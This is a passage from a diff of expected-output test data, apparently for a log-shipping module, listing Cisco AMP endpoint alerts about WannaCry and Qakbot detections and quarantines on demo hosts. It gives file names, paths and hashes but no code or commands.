[ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 732000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76965, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 78202, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 79439, + 
"related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 80676, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 81932, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 83114, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870786", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 
479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "", + "file.path": "", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 84487, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", 
+ "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 85686, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 87059, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" 
+ ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88168, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 89361, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection_id": "6419239046651838535", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239050946806000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90868, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814971", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + 
"event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 91988, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93180, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 773000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 94365, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782277", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 95638, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782276", + "cisco.amp.event_type_id": 
1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 570000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 96911, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782275", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 414000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + 
"malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 98184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 